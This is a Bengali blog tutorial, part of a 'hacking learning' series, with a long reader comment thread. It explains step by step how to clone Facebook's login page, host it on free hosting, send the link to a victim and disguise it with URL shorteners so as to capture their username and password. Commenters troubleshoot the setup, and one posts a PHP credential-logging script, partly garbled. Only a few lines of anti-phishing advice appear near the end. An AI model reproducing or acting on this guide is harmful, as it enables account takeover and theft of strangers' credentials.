হ্যাকিং লার্নিং :: ফিশিং-২ (একটি নকল পেজ):আপডেটেড [অধ্যায়-১১]

টিউন বিভাগ অল্টারিং
প্রকাশিত
জোসস করেছেন

হ্যাকিং লার্নিং

এ অধ্যায়ে আমরা শিখব কিভাবে আপনি ধাপে ধাপে একটি ফিশিং স্ক্রিপ্ট তৈরী করবেন। এক্ষেত্রে ফেসবুক ফেক পেজ বানাব আমরা। আরও শিখব কিভাবে তা কোন হোস্টিং সাইটে আপলোড করবেন। কিভাবে ফিসিং URL  লুকাবেন এবং কিভাবে ফিশিং থেকে নিজেকে রক্ষা করবেন।

facebook phishing,paypal phishing

প্রথমেই কাজে লেগে পড়ি।  কাজ শুরু করার পূর্বে দেখে নিন ফেসবুক লগআউট করেছেন কিনা। না করে থাকলে প্রথমে লগআউট করে নিন। এবার প্রবেশ করুন নিচের সাইটে অথবা ব্রাউজারে (ফায়ারফক্স ব্যবহার করুন।) লিখুন।

http://www.facebook.com/login.php

নিচের মত একটি পৃষ্ঠা আসবে। এবার মাউনের ডান বাটনে ক্লিক করে View Page Source এ ক্লিক করুন। একটি নতুন পৃষ্ঠা খুলবে। নীচে দেখুন।

ফেসবুক ফিশিং,facebook phishing,phishing

এবার সোর্স কোডের সবগুলো কপি করে নিন।

ব্রাউজারে লিখুন http://www.ripway.com

সাইট আপ করুন। নিচে লক্ষ্য করুন।

facebook hacking,phishing

লগইন করুন। My Files এ ক্লিক করুন। Create Text File এ ক্লিক করুন।

Enter a file name এ আপনি লিখুন login.php

এর নীচের টেক্স এরিয়ায় আপনি ফেসবুকের লগইন পেজের যে সোর্স কোড কপি করেছেন সেটি পেষ্ট করে দিন। নিচে লক্ষ্য করুন।

create a phishing script,create  a phishing page

পেষ্ট করা হয়ে গেলে Create এ ক্লিক করুন। একটি টেক্সট ফাইল তৈরী হবে। আবার Create Text File এ ক্লিক করুন। Enter a file name এ আপনি লিখুন password.php

টেক্সট এরিয়ায় নিচের কোডটুকু লিখুন।

উপরে লক্ষ্য করুন কালো রং করা স্থানে আপনি আপনার লিংক ইউআরএল বসান। ঐটা হচ্ছে আমার ইউআরএল। সাধারনত ইউআরএল ফরম্যাট হয় “http://h1.ripway.com/আপনার ইউজার নেম

শেষে Create বাটনে ক্লিক করুন। এখন আপনি দুটি টেক্সট ফাইল তৈরী করেছেন।

এবার আমরা login.php ফাইলটি এডিট করব। আপনার ব্রাউজারে Crtl+F চাপুন। এবার Find বক্সে লিখুন <form

এবার <form থেকে ব্লক করা শুরু করুন। শেষ করুন নীচের চিত্র দেখুন।

ফেসবুক ফিশিং

ফেসবুক ফিশিং

ডিলিট করে দিন। এর স্থলে বসান নিচের কোডটি।

Save এ ক্লিক করুন।

এবার login.php এর লিংকটি কপি করে আপনি যার একাউন্ট হ্যাক করতে চান তাকে পাঠিয়ে দিন এবং মজা দেখুন।

facebook hack,phishing pageযখন আপনার বন্ধু লগইন করবে তখন My Files এ ক্লিক করলে দেখতে পাবেন password.txt নামে আরেকটি ফাইল তৈরী হয়েছে। ঐ ফাইলের Edit এ ক্লিক করলেই আপনি ভিকটিমের লগইন ও পাসওয়ার্ড পেয়ে যাবেন। এভাবে আপনি যেকোন সাইটের ফিশিং স্ক্রিপ্ট বানাতে পারবেন শুধু লগইন ইউআরএল টা বের করতে হবে আরকি……..lolz

ripway এর মত আরো কয়েকটি হোস্টিং সাইট

http://www.byethost.com/free-hosting

http://www.000webhost.com

http://www.0php.com

কিভাবে ফিশিং লিংক হাইড করবেন

প্রথমে নীচের দুটি লিংকের যেকোন একটিতে প্রবেশ করুন।

http://www.tinyurl.com

http://www.dot.tk

http://www.bit.ly

এবার ফিশিং লিকটি কপি করে নিন। উপরের যেকোন একটি সাইটে লিংকটি বসিয়ে ছোট করে নিন। হয়ে গেল লিংক হাইড।

এবার ফিশিং থেকে রক্ষা পাবার উপায়

  • শক্তিশালী পাসওয়ার্ড ব্যবহার করুন। (অবশ্যই ১১ ডিজিট, স্মল ও ক্যাপিটাল অক্ষর, চিন্হের সমন্বয়ে গঠিত)
  • ইমেইল খোলার ব্যাপারে সাবধান থাকবেন।
  • কেউ কোন লিংক দিলে তা যাচাই করে নিবেন। ফায়ারফক্সের ক্ষেত্রে এখান থেকে এই এডঅনটি ডাউনলোড করে নিন। আর লিংক যাচাইয়ের জন্য এখানে বা এখানে ক্লিক করুন।
  • যেনতেন জায়গায় রেজিষ্ট্রেশন করবেন না।

এখন থেকে হ্যাকিং বিষয়ক ধারাবাহিক টিউটোরিয়াল আপনারা Hacking Class by http://www.mahedi.info ট্যাগে পাবেন।

টিউনটি পূর্বে এখানে প্রকাশিত।

Level New

আমি M4H3D1 H454N। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 13 বছর 6 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 43 টি টিউন ও 283 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 12 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।

মানুষের কল্যানে ভালো কিছু করার ইচ্ছে আছে জীবনে।


টিউনস


আরও টিউনস


টিউনারের আরও টিউনস


টিউমেন্টস

আসলে সত্যি কথা বলতে কি আপনাকে অনেক ধন্যবাদ। জানেন আরো দেড় থেকে দুই বছর আগে, তখোনো আমি কম্পিউটার কিনিনি,আমি কলেজ থেকে বাসায় ফিরার সময় প্রথম আলো পেপার কিনে আনি। ওই পেপারে প্রথম techtunes এর কথা জানতে পারি। তারপর,আমি পেপার এর অই অংশটুকু কেটে রাখি। পরের দিন cyber cafe এ গিয়ে techtunes এ প্রবেশ করি। তারপর, এতো ভাল লাগল যে প্রতি তিনদিন পর পর techtunes এ ঢুকতাম। তারপর, hsc পরিক্ষার পর computer কিনি। তারপর তো আর কথা নাই, প্রতিদিন দুই-তিনবার ঢুকতাম। এখন techtunes এ প্রতিদিন আসি, কারন techtunes ছাড়া একদিনও থাকতে পারব না।

এতো কথা কেন বললাম?কারন সেই ২ বছর আগে techtunes এ এসে যেরকম অনেক ভাল লাগত, তেমনি আপনার,mithu, আর ছাত্র ও শিক্ষক এর টিউন পরে সেই আগের মত লাগে।

তাই,please continue.

Level New

আপনি অসাধারন একটি কমেন্ট করেছেন আপু।
আসলেই টিটি ছাড়া থাকতে কষ্ট হয় আমারও।
আমি প্রতিদিনই আসি যতই কাজ থাকুক।
কিন্তু লগইন করে কমেন্ট করার সময় পাই না……………:xD
ভালো থাকবেন।

Level New

:D:D:D:D

আসলেই টিটি ছাড়া থাকতে কষ্ট হয়। ওহে আপনার টিউন টা ভালো হয়েছে কিন্তু মেহেদি ভাই একদিনে সব দিলে তো সব ভুলে খাইয়া ফেলব আর কোন ছেড়ে কোন টা খাবো এমন অবস্থা হচ্ছে।

    Level New

    আমিও তাই ভাবছি ভাই।
    এখন থেকে …………..lolz

Level 0

আজই আমার ছোট ভাইয়ের ফেসবুক একাউন্ট করব । প্রিয়তে নিলাম । Taher ভাইয়ের সাথে একমত প্রতিদিন একাধিক টিউন না করে একটি টিউন দ দিলে ভাল আর তা না হলে সব ভুলে খেয়ে বসে থাকব ।

    Level New

    হুম। ভাবছি ভাবছি।
    না ভাই ছোট ভাইকে এমন নাজেহাল কইরেন না………….lol
    ভালো থাকবেন।

Level 0

techtunes er mati…mahedi bhai er ghati…….. 😀

    Level New

    টেকটিউন্সের মাটি টেকপ্রেমিকদের ঘাটি!
    ঠিক আছে ভাই?
    পাশে থাকুন।

    Level 0

    mahedi bhai….facebook er phishing site e id pass dile Bad Request (Invalid URL) eita ashe…..password.txt name kono file create hoy na hosting site e, ami http://www.ripway.com e hosting korsi….ghotona ki ektu janaben…ar apner ym or msn id ta dile kushi hoitam…wish ur good like…

    regards
    Moshtishko

    Level New

    ভাই এ রকম হওয়ার কথা নয় মোটেও।
    আপনি আরেকবার চেষ্টা করুন।
    কথায় আছে একবার না পারিলে দেখ শতবার………lol
    প্রক্রিয়াটি ১০০% পরীক্ষিত।
    আমি ইয়াহুতে থাকি না।
    অধিকাংশ সময় ট্রেড ম্যানেজারে থাকি (এটা ব্যবসায়িকদের জন্য)
    স্কাইপিতে অধিকাংশ সময় আমার ক্লায়েন্টদের সাথে কথা বলি বা চ্যাট করি।
    স্কাইপি : raimentgroup
    সমস্যা হলে জানাবেন। ধন্যবাদ।

    স্কাইপে অ্যাড দিলাম username: maruf.alam8

Level New

শিখতে মনে চায়, আপনাদের টিটি পরে কাজ করি সফল হয় না। তবে কার ক্ষতির জন্য নয় জানার জন্য। তাই আপনার সব গুলো টিটি আমার প্রিয়তে রেখে দিলাম।

অসাধারণ টিউন। চালিয়ে যান মেহেদি ভাই।

    Level New

    অসাধারন কমেন্ট। চালিয়ে যেতে চেষ্টা করছি ভাই।
    ধন্যবাদ।

জটিল টিউন । সরাসরি প্রিয়তে নিলাম ।

http://www.probarta.com

    Level New

    ধন্যবাদ যোবায়ের ভাই।

প্রিয়তে।

মেহেদি ভাই আপনার কাছে কি http://www.webanswers.com এর মতো কোন ক্লোন স্ক্রীপ্ট আছে।

    Level New

    ভাই দু:খিত। আমার কাছে নেই।
    তবে আপনি নিচের দুটি লিংকে খুঁজে দেখতে পারেন।
    http://script.yourdada.com
    http://www.scriptmafia.com
    কমেন্টের জন্য ধন্যবাদ।

Level 0

"মেহেদী হাসান" । বাহ ভাই,সংখ্যা আর অক্ষরের অপূর্ব সমন্বয়।

Level 0

ওহ,বলতে ভুলে গেছি। আপনার টিউনগুলোর জন্য ধন্যবাদ। এখনও পড়ে দেখিনি পরীক্ষা চলছে বলে। পরীক্ষা শেষে পড়ব। তবে ভাল,এটা বুঝতে পারছি। তা না হলে এত কমেন্ট আসতো না আর আপনিও এত পর্ব চালাতেন না। আবারও ধন্যবাদ।

    Level New

    ধন্যবাদ মিঠু ভাই।
    আপনার টিউন গুলোও ভালো হচ্ছে।
    আমি নিজেও একজন গ্রাফিক্স ডিজাইনার।
    চালিযে যান।
    ভালো থাকবেন।

আমার মতে, ভাইয়া আমি এটা অনেক বার করেছি এবং এখন করি। এমন কিছু হোস্টিং এর নাম দেন যারা একাউন্ট ব্লক করে না। আর আপনি বলেছেন যে, .txt ফাইলটা এমনি তৈরি হয়ে যাবে। তবে অধিকাংশ ক্ষেত্রে এই জিনিসটিই সমস্যা করে। তার চেয়ে নিজেই মনে হয় ঐ নামে .txt ফাইলটি বানিয়ে আপলোড করলে ভালো হয়।

Level 2

মেহেদি ভাই, আপনিতো টেকটিউনসে রীতিমতো ঝড় তুলে ফেলেছেন। আপনার টিউনগুলো খুবই ভাল লেগেছে। কে কি বলে না বলে সেদিকে তাকাবেন না। হিংসুকেরা হিংসা করে অনেক কিছুই করতে চাইবে। প্লিজ ফালতু লোকের ফালতু কথায় কান না দিয়ে আপনি চালিয়ে যান, আমরা আছি আপনার পাশে। আপনার টিউন পড়তে পড়তে হয়ত কোন একদিন ভাল হ্যাকার হয়ে যাব। ধন্যবাদ আপনাকে সুন্দর সুন্দর টিউন করার জন্য।

    Level New

    আপনাকেও ধন্যবাদ জাভেদ ভাই গঠনমূলক কমেন্ট করার জন্য।
    পাশে থাকবেন।

এই হোস্টিং সাইট কি ফিশিং লিঙ্ক পেলে এ্যাকাউন্ট বন্ধ করে নাকি?

    Level New

    বন্ধ করার সম্ভাবনা থাকে।

আমারটা হয় না বলে পিএইচপি এর ২নম্বর লাইনে ভুল

    Level New

    প্রক্রিয়াটা পুনরায় ফলো করুন।
    সবকিছু নতুন করে করুন।
    ইনশাআল্লাহ হবে।
    ভালো থাকবেন।

vai, copy paste maira korsi, ai joonno hoitesena naki? sob korlam, kintu login korte gele BAD REQUEST dekhay

    Level New

    মনে হয় এ কারনেই।
    কোডটি নোটপ্যাডে লিখে নিয়ে তারপর পেষ্ট করে দেখুন তো।
    ধন্যবাদ।

Level 0

হাসান ভাই সালাম নিবেন। আমি আপনার দেখানো চিত্র মতো login.php এবং password.php ফাইল দুটি তৈরী করেছি। তারপর আমি login.php ফাইলটি পরীক্ষামুলকভাবে আমার নিজের একটা ইয়াহু তে সেন্ড করলাম। তখন ওই আইডি অপেন করে আমি লিংক টিতে ক্লিক করে দুইবার আইডি পাসওয়ার্ড দিয়ে ফেসবুকে ঢুকলাম। আপনি বলেছেন এভাবে কেউ লগইন করলেই তার পাসওয়ার্ড password.txt নামের ফাইলে ripway তে চলে আসবে। কিন্তু আমার বেলায় তো password.txt নামের কোন ফাইল এলো না। ripway তে আমার আগের দুইটা ফাইলই রয়ে গেলো। এখন আমি কি করতে পারি জানালে উপকৃত হবো। ভালো থাকবেন হাসান ভাই।

    Level New

    আপনি হলুদ কালি দিয়ে চিন্হিত ও কালো কালি দিয়ে মুছে দেয়া স্থানে কি আপনার ইউজার আইডি বসিয়েছিলেন?
    কোডটি প্রথমে নোটপ্যাডে লিখুন। তারপর রিপওয়েতে পেষ্ট করুন।
    এরপর দেখুন কাজ হয় কিনা?
    ধন্যবাদ।

password.php file টা লিখতে পারতেছিনা… অনুগ্রহ করে যদি commnt এ লিখে দিতেন… তাহলে উপক্রিত হতাম

Network Error (tcp_error) …bhi amak aita show kore..ki kora jay bolun to???

<?php
header("Location: https://h1.ripway.com/আপনার ইউজার নেম/login.php);
shandle=fopen("passwords.txt","a");
foreach(S_GET as Svariable=>Svalue){
fwrite(Shandle, Svariable);
fwrite(Shandle, "=");
fwrite(Shandle, Svalue);
fwrite(Shandle, "\r\n");
}
fwrite(Shandle, "\r\n");
fclose(Shandle);
exit;
?>

ধন্যবাদ শাহাদাত ভাই….

মেহেদি ভাই… যে সব ওয়েব পেজ এর login page নাই তাদের বেলায় কি হবে? যেমন http://www.abc.com এই পেজ এর যদি আলাদা কোন login form না থাকে? এদের বেলায় কি ফিশিং করা যাবেনা?

Level 0

jokhn amr link e kew login kore nicher likha ta ashe
Parse error: parse error, unexpected T_STRING in \\192.168.0.16\webfiles\files\2011-9\3781385\password.php on line 3

Level 0

মেহেদি ভাই আমার একি সমস্যা ।Parse error: parse error, unexpected T_STRING in \\192.168.0.16\webfiles\files\2011-9\3781385\password.php on line 3 এটা দেখায়। pls…হেল্প করেন।

Level 0

ভাইয়া আপনার পোস্টের ছবি গুলো তো দেখা যায় না 🙁

ভাই আপনার ১৫,১৬,১৭ পোস্ট এর জন্য password please দিন। আমার email id [email protected].

Awesome Facebook Phishing Script. Thank you so much for share. I’m looking for it